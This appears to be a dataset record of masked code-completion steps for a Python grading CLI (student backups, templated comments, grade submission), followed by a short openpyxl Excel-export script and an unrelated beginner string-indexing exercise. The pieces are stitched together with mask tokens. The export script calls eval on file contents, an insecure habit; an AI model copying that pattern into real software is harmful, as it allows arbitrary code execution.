{'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\n<mask token>\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n readline.parse_and_bind('tab: complete')\n readline.set_completer_delims('')\n print('cli.py main')\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f'{Fore.RED}An exception occurred while processing backup id #{id}'\n , file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n print(f'{Style.RESET_ALL}')\n continue\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, 'fields not substituted!'\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-4": "<mask token>\nparser.add_argument('proj', help=\n \"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\"\n )\n<mask token>\nparser.add_argument('proj', help=\n \"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\"\n )\n<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n readline.parse_and_bind('tab: complete')\n readline.set_completer_delims('')\n print('cli.py main')\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f'{Fore.RED}An exception occurred while processing backup id #{id}'\n , file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n print(f'{Style.RESET_ALL}')\n continue\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, 'fields not substituted!'\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\nif __name__ == '__main__':\n try:\n main()\n except:\n print(f'{Style.RESET_ALL}')\n", "step-5": "import os\nimport re\nimport sys\nimport traceback\nimport readline\nfrom typing import NamedTuple, List\n\nfrom PyInquirer import prompt\nfrom pygments import highlight\nfrom pygments.formatters.terminal import TerminalFormatter\nfrom pygments.lexers.python import PythonLexer\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Enter project endpoint')\nparser.add_argument(\"proj\", help=\"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\")\nargs = parser.parse_args()\nproj = args.proj\n\nfrom analyzer import get_problems, Comment\nfrom finalizing import grade\nfrom ok_interface import get_backup_ids, get_backup_code, submit_comment, submit_grade\nfrom colorama import Fore, Style\n\nfrom templates import template_completer, templates\n\nimport argparse\nimport config\n\nparser = argparse.ArgumentParser(description='Enter project endpoint')\nparser.add_argument(\"proj\", help=\"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\")\nargs = parser.parse_args()\nconfig.proj = args.proj\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments, curr_comment=None\n):\n clear()\n print(f\"Problem: {name}\")\n highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter())\n for i, line in enumerate(highlighted_code.split(\"\\n\")):\n line_num = problem.initial_line_number + i\n if line_num in accepted_comments or (\n curr_comment and line_num == curr_comment.line_num\n ):\n print()\n print(f\"{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}\")\n if line_num in accepted_comments or (\n curr_comment and line_num == curr_comment.line_num\n ):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(\n Fore.MAGENTA\n + \" \" * indent_level\n + \"# \"\n + accepted_comment.comment\n )\n if curr_comment and line_num == curr_comment.line_num:\n print(\n Fore.RED\n + Style.BRIGHT\n + \" \" * indent_level\n + \"# \"\n + curr_comment.comment\n )\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print(\"Please provide supplementary information:\")\n field_vals = {}\n for field in comment.fields:\n q = {\"type\": \"input\", \"name\": \"field\", \"message\": field + \":\"}\n response = wrapped_prompt(q)\n field_vals[field] = response[\"field\"]\n\n complete_text = comment.comment.format(**field_vals)\n q = {\n \"type\": \"input\",\n \"name\": \"final\",\n \"message\": \"Final message\",\n \"default\": complete_text,\n }\n response = wrapped_prompt(q)\n\n return Comment(comment.line_num, response[\"final\"])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\\n\\n\"\n f\"cancel = cancel this comment\\n\"\n f\"clear = clear all question comments\\n\"\n f\"reset = reset all student comments\\n\"\n f\"? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n\n \n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer_delims(\"\")\n print(\"cli.py main\")\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f\"{Fore.RED}An exception occurred while processing backup id #{id}\",\n file=sys.stderr,\n )\n traceback.print_exc(file=sys.stderr)\n print(f\"{Style.RESET_ALL}\")\n continue\n\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, \"fields not substituted!\"\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {\n \"type\": \"confirm\",\n \"name\": \"ok\",\n \"message\": \"Does this grade look reasonable?\",\n }\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == \"reset\":\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments, comment\n )\n print(f\"{Fore.CYAN}Potential comment: {Style.RESET_ALL}\")\n print(\n f\"{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}\"\n )\n q = {\n \"type\": \"confirm\",\n \"name\": \"ok\",\n \"message\": \"Add comment\",\n \"default\": True,\n }\n response = wrapped_prompt(q)\n if response[\"ok\"]:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == \"cancel\":\n continue\n raise\n\n while True:\n try:\n display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments\n )\n response = wrapped_input(\n f\"? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}\"\n )\n if not response:\n q = {\n \"type\": \"confirm\",\n \"name\": \"ok\",\n \"message\": \"Go to next question?\",\n \"default\": True,\n }\n response = wrapped_prompt(q)\n if response[\"ok\"]:\n break\n continue\n if response not in templates:\n print(\n f\"{Fore.RED} Template {response} not found! {Style.RESET_ALL}\"\n )\n continue\n text = templates[response]\n q = {\"type\": \"input\", \"name\": \"line_num\", \"message\": \"Line number:\"}\n response = wrapped_prompt(q)\n try:\n line_num = int(response[\"line_num\"])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n\n if text:\n fields = list(set(re.findall(r\"{(.*?)}\", text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {\"type\": \"input\", \"name\": \"text\", \"message\": \"Comment:\"}\n response = wrapped_prompt(q)\n comment = Comment(line_num, response[\"text\"], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == \"cancel\":\n continue\n raise\n print()\n\n return list(sum(accepted_comments.values(), []))\n\n except Interrupt as e:\n if e.cmd == \"clear\":\n return grade_problem(name, problem)\n raise\n\n\nif __name__ == \"__main__\":\n try:\n\n main()\n except:\n print(f\"{Style.RESET_ALL}\")\n", "step-ids": [ 9, 12, 13, 14, 17 ] }
[ 9, 12, 13, 14, 17 ]
<|reserved_special_token_0|> def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') if __name__ == '__main__': write_list(read_file()) <|reserved_special_token_1|> import openpyxl <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') if __name__ == '__main__': write_list(read_file()) <|reserved_special_token_1|> import openpyxl # 适用于xlsx文件 ''' 纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示: { "1":["张三",150,120,100], "2":["李四",90,99,95], "3":["王五",60,66,68] } 请将上述内容写到 student.xls 文件中 ''' def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() # print(content) # print(type(content)) word = eval(content) # print(word) # print(word.keys()) # for each in word.keys(): # print(each) # print(word[each]) # print(word.values()) # print(type(word)) for i, j in zip(word.keys(), word.values()): # print(i, j) words.append([i, j]) print(words) return words def write_list(list): # 写入excel文件 wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print("写入数据成功!") if __name__ == '__main__': # read_file() write_list(read_file())
flexible
{ "blob_id": "f75e0ddf42cc9797cdf1c4a4477e3d16441af740", "index": 5478, "step-1": "<mask token>\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\nif __name__ == '__main__':\n write_list(read_file())\n", "step-4": "import openpyxl\n<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\nif __name__ == '__main__':\n write_list(read_file())\n", "step-5": "import openpyxl # 适用于xlsx文件\n'''\n纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示:\n\n{\n\t\"1\":[\"张三\",150,120,100],\n\t\"2\":[\"李四\",90,99,95],\n\t\"3\":[\"王五\",60,66,68]\n}\n请将上述内容写到 student.xls 文件中\n'''\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n # print(content)\n # print(type(content))\n\n word = eval(content)\n # print(word)\n # print(word.keys())\n # for each in word.keys():\n # print(each)\n # print(word[each])\n # print(word.values())\n # print(type(word))\n for i, j in zip(word.keys(), word.values()):\n # print(i, j)\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list): # 写入excel文件\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print(\"写入数据成功!\")\n\n\nif __name__ == '__main__':\n # read_file()\n write_list(read_file())\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# 遍历(循环) 出字符串中的每一个元素 str01 = "大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&" # ----->字符串中的元素都是有索引的,根据索引可以得到对应的元素 # 而---3 a = str01[3] print(str01[3]) # 发---1 print(str01[1]) #---->计算字符串的长度 # 这个字符串中 有 35个元素 ,长度是35 l01 = len(str01) print(l01) str01 = "大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&" # 最后一个元素的索引:字符串的长度-1 len01 = len(str01)# 字符串的长度 index_last = len01 - 1 # 最后一个元素的索引 i = 0 # i变量表示是 元素的索引 while i <= index_last: print(str01[i]) i += 1 print() print("上面的循环结束了 执行到这里") ''' 0 1 2 ..... 34 '''
normal
